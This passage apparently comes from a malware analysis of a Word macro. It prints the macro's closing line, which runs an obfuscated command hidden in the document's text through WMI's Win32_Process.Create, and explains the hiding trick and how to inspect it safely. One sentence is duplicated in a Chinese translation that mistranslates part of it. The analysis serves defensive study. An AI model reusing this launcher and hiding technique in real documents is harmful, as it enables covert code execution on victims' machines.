    ProcessObjectInstance.Create WrapperForRemoveBogusQqFromString(ObfuscatedCommandLine), "", ""
End Function

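This takes an obfuscated command line stored in a Word object called T6dwlv_ivpoiq2 (I assume ThisDocument has been renamed to that) and runs it via Win32_Process::Create.这需要一个存储在名为T6dwlv_ivpoiq2的 Word object 中的模糊命令行(我假设ThisDocument已重命名为该命令行)并通过Win32_Process::Create运行它。 Note that the command line itself is not in the macro: it is the text of the document's first story range from the fifth character onwards, padded with the same "qq)(s2)(" filler. To see what would actually be run, extract that text from the file and strip the filler, rather than executing the macro. Because the launcher is WMI's Win32_Process, it can only work on Windows; under LibreOffice on Linux the CreateObject call should fail, and On Error Resume Next hides that failure.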
